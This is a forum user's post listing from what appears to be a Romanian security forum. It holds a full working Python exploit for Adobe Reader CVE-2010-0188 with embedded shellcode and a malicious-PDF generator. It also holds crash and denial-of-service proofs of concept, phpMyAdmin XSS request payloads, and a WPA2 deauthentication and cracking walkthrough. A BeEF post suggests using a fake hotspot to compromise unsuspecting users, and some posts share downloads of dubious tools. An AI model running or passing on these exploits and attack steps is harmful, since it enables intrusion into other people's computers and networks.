Jump to content

begood

Active Members
 View Profile  See their activity

  • Posts

    3972

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Everything posted by begood

  1. begood
    __doc__=''' Title: Adobe PDF LibTiff Integer Overflow Code Execution. Product: Adobe Acrobat Reader Version: <=8.3.0, <=9.3.0 CVE: 2010-0188 Author: villy (villys777 at gmail.com) Site: http://bugix-security.blogspot.com/ Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3) ------------------------------------------------------------------------ ''' import sys import base64 import struct import zlib import StringIO SHELLCODE_OFFSET=1500 TIFF_OFSET=0x2038 # windows/exec - 227 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=process, CMD=calc.exe buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4" buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63" buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98" buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1" buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5" buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56" buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0" buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a" buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6" buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60" buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff" buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c" buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff" buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e" buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff" buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2" buf += "\x09\xc1\x5f\x00" class CVE20100188Exploit: def __init__(self,shellcode): self.shellcode = shellcode self.tiff64=base64.b64encode(self.gen_tiff()) def gen_tiff(self): tiff = '\x49\x49\x2a\x00' tiff += struct.pack("<L", TIFF_OFSET) tiff += '\x90' * (SHELLCODE_OFFSET) tiff += self.shellcode tiff += '\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET) tiff += "\x07\x00\x00\x01\x03\x00\x01\x00" tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00" tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01" tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00" tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20" tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00" tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01" tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15" tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00" tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8" tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C" tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01" tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15" tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11" tiff += "\x00\x07" return tiff def gen_xml(self): xml= '''<?xml version="1.0" encoding="UTF-8" ?> <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config xmlns="http://www.xfa.org/schema/xci/1.0/"> <present> <pdf> <version>1.65</version> <interactive>1</interactive> <linearized>1</linearized> </pdf> <xdp> <packets>*</packets> </xdp> <destination>pdf</destination> </present> </config> <template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/"> <subform name="topmostSubform" layout="tb" locale="en_US"> <pageSet> <pageArea id="PageArea1" name="PageArea1"> <contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" /> <medium short="612pt" long="792pt" stock="custom" /> </pageArea> </pageSet> <subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt"> <break before="pageArea" beforeTarget="#PageArea1" /> <bind match="none" /> <field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm"> <ui> <imageEdit /> </ui> </field> <?templateDesigner expand 1?> </subform> <?templateDesigner expand 1?> </subform> <?templateDesigner FormTargetVersion 24?> <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?> <?templateDesigner Zoom 94?> </template> <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"> <xfa:data> <topmostSubform> <ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1> </topmostSubform> </xfa:data> </xfa:datasets> <PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" /> <form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/"> <subform name="topmostSubform"> <instanceManager name="_Page1" /> <subform name="Page1"> <field name="ImageField1" /> </subform> <pageSet> <pageArea name="PageArea1" /> </pageSet> </subform> </form> </xdp:xdp> ''' return xml def gen_pdf(self): xml = zlib.compress(self.gen_xml()) pdf='''%PDF-1.6 1 0 obj <</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>> stream ''' + xml+''' endstream endobj 2 0 obj <</V () /Kids [3 0 R] /T (topmostSubform[0]) >> endobj 3 0 obj <</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>> endobj 4 0 obj <</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>> endobj 5 0 obj <</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>> endobj 6 0 obj <</Kids [5 0 R]/Type /Pages/Count 1>> endobj 7 0 obj <</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>> endobj 8 0 obj <</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>> endobj xref trailer <</Root 7 0 R/Size 9>> startxref 14765 %%EOF''' return pdf if __name__=="__main__": print __doc__ if len(sys.argv) != 2: print "Usage: %s [output.pdf]" % sys.argv[0] print "Creating Exploit to %s\n"% sys.argv[1] exploit=CVE20100188Exploit(buf) f = open(sys.argv[1],mode='wb') f.write(exploit.gen_pdf()) f.close() print "[+] done !"
  2. begood
    da. l-am facut pentru ca m-a rugat SympleBoy22 ^^
  3. begood
    wpa/wpa2
  4. begood
    @SympleBoy22 uite: MEGAUPLOAD - The leading online storage and file delivery service 2shared - download [python][PE]_raw_-_Php_Proxy_Clicker_[cmiN]_rstcenter.rar file name : [python][PE]_raw_-_Php_Proxy_Clicker_[cmiN]_rstcenter.rar MD5 : 0b299d3877f7582c331bb93810ef5bf2 password : rstcenter.com
  5. begood
    Stiu ca sunt tutoriale video deja facute, dar astfel il impingeam sa invete sa faca el tutoriale.
  6. begood
    Daca am evoluat atat in 20 de ani, e clar crestere exponentiala, nici nu pot sa-mi , ce o sa mai scoata in 10 ani.
  7. begood
    @zippy fa un video tutorial ^^
  8. begood
    Am facut o versiune "exe" a acestui script. Pentru cei care nu au instalat python. http://www.2shared.com/file/12079495/6346e742/pythonPE_yidl_-_Yahoo_ID_Locke.html http://www.megaupload.com/?d=8DQNMH89 file name : [python][PE]_yidl_-_Yahoo_ID_Locker_[cmiN]_rstcenter.rar MD5 : 211ca83b5f16c0a74b95311cec645f3e password : rstcenter.com
  9. begood
    esti chior ? am 3 linkuri catre sursa
  10. begood
    Penetration Testing Framework 0.57 E o lista cu multe, foarte multe tool-uri. Intrati pe pagina principala si aveti in stanga organizat frumos cele mai bune tool-uri de pentesting. poster : http://www.vulnerabilityassessment.co.uk/Framework.png
  11. begood
    #! /usr/bin/python # # ############################################################################# # Media Player classic StatsReader (.stats file) stack buffer Overflow poc # Software Link: http://mpc-hc.sourceforge.net/download-media-player-classic-hc.html # Tested in : Windows XP SP3 # Credit : ItSecTeam # mail : Bug@ItSecTeam.com # Web: WwW.ITSecTeam.com # Find by: PLATEN @ ItSecTeam # Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder # patch: C:\Program Files (x86)\K-Lite Codec Pack\Tools\StatsReader.exe # Usage: ./stats-poc.py # ############################################################################# # print """ [~] Media Player clissic StatsReader (.stats file) stack buffer Overflow poc [~] mail : Bug@ItSecTeam.com [~] Web: WwW.ITSecTeam.com [~] Find by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam """ data= "\x41" *500000 try: file=open("media-poc.stats",'w') file.write( data ) file.close() print ("[+] File created successfully: media-poc.stats" ) except: print "[-] Error cant write file to system\n"
  12. begood
    /*FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. This issue affects the following releases: FreeBSD 8.0, 6.3, 4.9 OpenBSD 4.5 and 4.6 PoC: */ #include <glob.h> #include <stdio.h> #define MAXUSRARGS 100 #define MAXGLOBARGS 1000 void do_glob() { glob_t gl; char **pop; char buffer[256]; strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}"); int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE; memset(&gl, 0, sizeof(gl)); gl.gl_matchc = MAXGLOBARGS; flags |= GLOB_LIMIT; if (glob(buffer, flags, NULL, &gl)) { printf("GLOB FAILED!\n"); return 0; } else // for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1); for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1); pop++) { printf("glob success"); return 0; } globfree(&gl); } main(int argc, char **argv) { do_glob(); do_glob(); }
  13. begood
    Enhanced Interior Gateway Routing Protocol (EIGRP) cheatsheet. Version 2.0. b46dfa36f672393548cb496de302680b .:[ packet storm ]:. - http://packetstormsecurity.org/ First Hop Redundancy cheatsheet. Version 2.0. e9af68fbc0725c91633fb0cf1fcb47ae .:[ packet storm ]:. - http://packetstormsecurity.org/ IEEE 802.11 WLAN cheatsheet. Version 2.1. df57f1abe5751ba1bc9f04d7133750e2 .:[ packet storm ]:. - http://packetstormsecurity.org/ IEEE 802.1X cheatsheet. Version 2.0. c129739bbcc786a52d89501ec0342655 .:[ packet storm ]:. - http://packetstormsecurity.org/ Cisco IOS IPv4 Access Lists cheatsheet. Version 2.0. 22e0fbde4a4ce858110469fbea8ebdf8 .:[ packet storm ]:. - http://packetstormsecurity.org/ Cisco IOS Interior Routing Protocols cheatsheet. 9d5abb97e31c1e9636c2af341577182c .:[ packet storm ]:. - http://packetstormsecurity.org/ IPsec cheatsheet that discusses protocols, encryption algorithms, and more. Version 2.0. 0dec8bafc1756b3fcc274c33d26e15bb .:[ packet storm ]:. - http://packetstormsecurity.org/ IPv4 Multicast cheatsheet. Version 2.0. 4e5eeecf53400a4072817bb413c80874 .:[ packet storm ]:. - http://packetstormsecurity.org/ IPv4 subnetting cheatsheet. Version 2.0. 5e4f67f4d950de8899743aacf4bb5d03 .:[ packet storm ]:. - http://packetstormsecurity.org/ IPv6 cheatsheet that touches on everything from transition mechanisms to the protocol header. Version 2.0. 7305603194b5a30cc8eec42c70260ea8 .:[ packet storm ]:. - http://packetstormsecurity.org/ IS-IS cheatsheet that documents NSAP addressing, the protocol header, and more. Version 2.0. 409c063eaeaadc6529f4db4805d015f0 .:[ packet storm ]:. - http://packetstormsecurity.org/ Markdown cheatsheet. Version 2.0. To be used with the project from daringfireball.net. 86a3e02a213634bcd316b72c7078254c .:[ packet storm ]:. - http://packetstormsecurity.org/ MediaWiki cheatsheet. Version 2.1. 0cb5107e030605f2b5fd5d6dc9fe16a9 .:[ packet storm ]:. - http://packetstormsecurity.org/ Network Address Translation (NAT) cheatsheet. Version 1.0. 134e2f7d6b8d22d2c64bde1fed67ab1f .:[ packet storm ]:. - http://packetstormsecurity.org/ Open Shortest Path First (OSPF) cheatsheet. Version 2.1. 889d4df78579ed45e4f4f9bf8530b161 .:[ packet storm ]:. - http://packetstormsecurity.org/ Point-To-Point (PPP) cheatsheet. Version 1.01. b66a96c25b627c4bad21df7c4a7bdbba .:[ packet storm ]:. - http://packetstormsecurity.org/ Quality of Service (QoS) cheatsheet. Version 2.0. cdc307d92f1f39b805866611a8e883bd .:[ packet storm ]:. - http://packetstormsecurity.org/ Spanning Tree cheatsheet. Version 2.0. 248f2c830ddc58dd59b3e113cca2c4b8 .:[ packet storm ]:. - http://packetstormsecurity.org/ Virtual LAN (VLAN) cheatsheet. Version 2.0. f85d37502b395429c19b57e92f927570 .:[ packet storm ]:. - http://packetstormsecurity.org/ Wireshark Display Filters cheatsheet. Version 2.0. 5be0f7e39fb4a7f8ec90b34bfa08e1b2 .:[ packet storm ]:. - http://packetstormsecurity.org/ Common Ports cheatsheet. Version 1.1. 0533135bcf5befcbfb863a9e756b30e0 .:[ packet storm ]:. - http://packetstormsecurity.org/ Physical Terminations cheatsheet. Version 1.1. 4ec64869a3343e89c630673c8791b234 .:[ packet storm ]:. - http://packetstormsecurity.org/ tcpdump cheatsheet that gives a good layout of command line options, filter primitives, and more. Version 2.0. 9169b5f5d91e5f8f43bb839968a68a23 .:[ packet storm ]:. - http://packetstormsecurity.org/
  14. begood
    Is curios si eu, sa-mi zici ce reusesti/nu reusesti.
  15. begood
    PHP Charset Encoder
  16. begood
    there is a xss in phpmyadmin 3.3.0 when we create new database in interface, the "new_db" parameter do not filter characters when users enter. attacker can enter malicious code, like "<script>alert(/liscker/);</script>". it also can be true in post and get. but in post, we can not encode xss code, or , the xss will faild. For example: GET: http://localhost/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251a b7ae3934&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fsc ript%3E&db_collation= POST: POST /phpmyadmin/db_create.php HTTP/1.1 Accept: */* Referer: http://localhost/phpmyadmin/db_create.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727) Host: localhost Content-Length: 123 Connection: Keep-Alive Cache-Control: no-cache Cookie: phpMyAdmin=95830e770d0f213c04d63b623940f46f95c6f571; pma_lang=en-utf-8; pma_charset=utf-8; pma_collation_connection=utf8_general_ci; pmaUser-1=Hfd255%2Bp2dc%3D; pma_navi_width=200; pmaPass-1=MlPzQC8J2iY%3D; pma_fontsize=82%25; pma_theme=original token=759f7a380111a292995ec447408bbdb3&reload=1&new_db=%3Cscript%3Ealert %28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation= When you test, please replace the session "759f7a380111a292995ec447408bbdb3" with yourself. I suggest to test it in interface. Liscker SecurityFocus
  17. begood
    The latest version of the Zeus do-it-yourself crimeware kit goes to great lengths to thwart would-be pirates by introducing a hardware-based product activation scheme similar to what's found in Microsoft Windows. The newest version with bare-bones capabilities starts at $4,000 and additional features can fetch as much as $10,000. The new feature is designed to prevent what Microsoft refers to as "casual copying" by ensuring that only one computer can run a licensed version of the program. After it is installed, users must obtain a key that's good for just that one machine. "This is the first time we have seen this level of control for malware," according to an analysis of the latest Zeus version published this week by SecureWorks. The hardware-based licensing system isn't the only page Zeus creators have borrowed from Microsoft. They've also pushed out multiple flavors of the package that vary in price depending on the capabilities it offers. Just as Windows users can choose between the lower-priced Windows 7 Starter or the more costly Windows 7 Business, bot masters have multiple options for Zeus. For a mere $500 more, users can get a Zeus module that will allow them to received pilfered data in real time using the Jabber instant messaging client. A module that grabs data out of fields typed into Firefox fetches an extra $2,000, and a virtual network computing module that allows users to establish a fully functioning connection to an infected computer costs $10,000. The VNC functionality fetches such a high price because it allows criminals to bypass some of the most advanced security measures, such a smartcards and other pieces of hardware that are used to authenticate high-value victims to a bank or other financial institution. The latest version of Zeus is 1.3.3.7, SecureWorks researcher Kevin Stevens told El Reg. But the authors are already busy working on version 1.4, which is being beta tested. It offers polymorphic encryption that allows the trojan to re-encrypt itself each time it infects a victim, giving each one a unique digital fingerprint. As a result, anti-virus programs, which already struggle mightily to recognize Zeus infections, have an even harder time detecting the menace. ® Trojan armed with hardware-based anti-piracy control ? The Register // cat de sec
  18. begood
    vezi ca linkul e legat de sesiune -> doar tu poti sa-l vezi o perioada, restul oamenilor nu il pot viziona, linkul fiind activ doar pe un ip.
  19. begood
    gom player.
  20. begood
    Basic steps : * Put interface in monitor mode * Find wireless network (protected with WPA2 and a Pre Shared Key) * Capture all packets * Wait until you see a client and deauthenticate the client, so the handshake can be captured * Crack the key using a dictionary file (or via John The Ripper) I’ll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0. First, put the card in monitor mode : root@bt:~# airmon-ng Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) ath1 Atheros madwifi-ng VAP (parent: wifi0) wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0) Ok, we can now use interface mon0 Let’s find a wireless network that uses WPA2 / PSK : root@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet Stop airodump-ng and run it again, writing all packets to disk : airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2 At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c) root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs] As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230 Stop airodump-ng and make sure the files were created properly root@bt:/# ls /tmp/wpa2* -al -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap -rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv -rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv Form this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc…. Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time. There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the worklist and feed it the .cap fie that contains the WPA2 Handshake. So if your wordlist is called word.lst (under /tmp/wordlists), you can run aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all. The second method (bruteforcing) will be successfull for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use : root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap (Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key. That’s it Update :after 20 hours of cracking, the key still has not been found. The system I’m using to crack the keys is not very fast, but let’s look at some facts : 8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could has 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 At about 600 keys per second on my “slow” system, it could take more than 101083382 hours to find the key (11539 year). I have stopped the cracking process as my machine is way too slow to crack the key while I’m still alive… So think about this when doing a WPA2 PSK Audit. http://www.corelan.be:8800/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper/
  21. begood
    +1. de la inceput.
  22. begood
  23. begood
    bha desteptule, acolo gasesti toate convorbirile cu toti userii pe care-i ai in lista. evident ca nu e arhiva cu numele tau (nickul). cauta "id-ul" celui cu care ai discutat, acela va fi folderul in care e tinut log-ul.
  24. begood
    %programfiles%\Yahoo!\Messenger\Profiles\[username]\Archive\Messages
  25. begood
    BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities. Development has focused on creating a modular structure making new module development a trivial process with the intelligence residing within BeEF. Current modules include the first public Inter-protocol Exploit, a traditional browser overflow exploit, port scanning, keylogging, clipboard theft and more. The modules are aimed to be a representative set of current browser attacks - with the notable exception of launching cross-site scripting viruses. You can download BeEF from Bindshell.net. Though BeEF can be used to exploit computers located anywhere on the Interent (e.g. by setting up a malicious site) and on the local LAN (e.g. use a simple MITM to send the payload), I particularly feel it would be very useful in compromising computers in hotspot destinations. Here is a simple use case - A hacker can setup a Honeypot advertising a local hotspot in the vicinity such as tmobile, google-wifi or starbucks. An unsuspecting user successfully connects to this honeypot and fires his browser to check his web email. The hacker re-directs the user and serves him a malicious page using BeEF. User gets 0wned Below are 2 videos about the BeEF framework: First is a simple walk through on how to get started with BeEF on Backtrack 4 and how one can detect if the victim has flash and java installed. The second video is a demo of the MS09-002 exploit using BeEF. Browser Exploitation Framework (BeEF) Tutorial
×
×
  • Create New...